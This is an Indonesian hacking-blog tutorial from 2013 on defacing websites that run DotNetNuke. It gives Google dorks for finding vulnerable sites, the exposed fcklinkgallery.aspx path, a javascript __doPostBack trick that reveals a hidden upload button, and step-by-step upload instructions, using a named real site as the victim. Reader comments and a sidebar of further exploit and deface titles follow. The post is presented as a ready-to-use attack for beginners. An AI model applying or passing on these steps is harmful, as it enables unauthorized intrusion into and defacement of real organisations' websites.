• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Tutorial Deface Dengan DNN | Newbie Only

March 12, 2013 by Jack Wilder 22 Comments

Kali ini saya akan share teknik deface dengan Dot Net Nuke atau biasa disebut DNN. Teknik ini sangat mudah sehingga cocok untuk pembelajaran bagi pemula. Untuk yang udah master lebih baik merem dulu. :v
Oke, langsung saja.

Google Dork :

  • inurl:”/portals/0″
  • inurl:fcklinkgallery.aspx

Dork lain silahkan dikembangkan sendiri.

    Exploit : Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
    Pertama, cari target di google dengan dork di atas. Nyarinya harus sabar. Dan ternyata alamat yang kita temukan adalah http://www.caslpo.com/Portals/0/kotek.xml
    Kedua, masukkan exploitnya dimulai dari portals/0/ . Sehingga menjadi http://www.caslpo.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
    Nanti akan menjadi seperti ini :

    Lalu pilih file. Hapus url di address bar dan ganti dengan script berikut javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

    Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .

    Tunggu proses upload selesai. Dan letak hasil deface kalian ada di http://situs/portals/0/namafile

    Sehinga hasil deface saya terletak di :
    http://www.caslpo.com/portals/0/jkt.txt

    Bagaimana ? Mudah kan ? Jika ada yang kurang jelas, silahkan bertanya di kotak komentar.

    • NB : Ekstensi file yang bisa di upload adalah : swf, jpg, jpeg, JPE, gif, bmp, png, doc, xls, ppt, pdf, txt, xml, xsl, css, zip, 3gp, asf, asx, avi, flv, m4v, mov, mp4, mpe, mpeg, mpg, ram, rm, rmvb, wm, wmv, vob . Kalian tidak bisa upload shell php !
    Shares

    Filed Under: Uncategorized Tagged With: Hacking

    Reader Interactions

    Comments

    1. BlogS of Hariyanto says

      March 12, 2013 at 10:00 pm

      karena saya bukan master..berarti tidak harus merem kan 🙂

      Reply
      • chiaki says

        March 13, 2013 at 12:09 am

        :v

        Reply
      • ilham haka says

        May 20, 2013 at 10:08 am

        bang DNN carinya dimana ?,

        pemula

        Reply
    2. febriansyah haq says

      March 13, 2013 at 12:43 am

      Mayan buat koleksi 🙂

      Reply
      • chiaki says

        March 13, 2013 at 12:49 am

        Hehehe

        Reply
    3. Masnady says

      March 13, 2013 at 1:35 am

      hehehehe saya sampai 2x baca sob.. tapi masih nggak mudeng.. mungkin kalau sambil praktek lebih cepet paham kali ya sob. tapi saya kan via hp. jadi nggak bisa sambil praktek..hehehehe

      Reply
      • chiaki says

        March 13, 2013 at 6:09 am

        Kalo praktek cepet. :v

        Reply
    4. Rohis Facebook says

      March 13, 2013 at 2:25 am

      jd takut ntr ada yg ngejahilin blog aq…., bisa2 ilmu ini disalahgunakan *smile

      Reply
      • chiaki says

        March 13, 2013 at 6:10 am

        Blogspot gak bisa. -_-

        Reply
    5. budi os 19 says

      March 13, 2013 at 3:10 am

      utk soal beginian mas yuyud paling ngetop deh 🙂

      Reply
    6. budi os 19 says

      March 13, 2013 at 3:10 am

      utk soal beginian mas yuyud paling ngetop deh 🙂

      Reply
      • chiaki says

        March 13, 2013 at 6:10 am

        Saya hanya pemula sob. :v

        Reply
    7. Djangkaru Bumi says

      March 13, 2013 at 4:51 am

      Cuma geleng-geleng kepala sambil merem deh 😀

      Reply
      • chiaki says

        March 13, 2013 at 6:11 am

        Hahaha. :v

        Reply
    8. Riyono says

      March 13, 2013 at 4:52 am

      Fungsi utamanya untuk apa itu sob 🙂

      Reply
    9. Abed Saragih says

      March 13, 2013 at 4:53 am

      Oh ini untuk mengubah deface tampilan awalan dari sebuah website yah sobat.

      Reply
      • chiaki says

        March 13, 2013 at 6:21 am

        Gak harus awalan.

        Reply
    10. cik awi says

      March 13, 2013 at 5:37 am

      Ane merem dulu sob… Wkwkwk!

      Reply
      • chiaki says

        March 13, 2013 at 6:08 am

        Master donk. (y)

        Reply
    11. cak oni says

      March 13, 2013 at 12:21 pm

      nice kang , buat new be

      Reply
      • chiaki says

        March 13, 2013 at 12:45 pm

        Ya. :v

        Reply
    12. Anonim says

      August 29, 2014 at 8:57 pm

      Hmm it seems like your blog ate my first comment (it was super long) so I guess I'll
      just sum it up what I had written and say, I'm thoroughly
      enjoying your blog. I too am an aspiring blog blogger but I'm still
      new to the whole thing. Do you have any points for first-time blog writers?
      I'd definitely appreciate it.

      Feel free to visit my web site: minecraft free

      Reply

    Leave a Reply Cancel reply

    Your email address will not be published. Required fields are marked *

    Primary Sidebar

    Popular Post

    Azure Traffic Manager Custom Domain or Subdomain Takeover

    Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

    CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

    Tutorial Hack WHM dan cPanel dengan WHMCS Killer

    Tumblr Custom Domain or Subdomain Takeover

    Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

    WordPress Army Knife CSRF File Upload Vulnerability

    Open Redirect Bypass Cheat Sheet

    WordPress Fraction Theme Version 1.1.1 Privilege Escalation

    Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

    LinuxSec / 87 queries in 0.22 seconds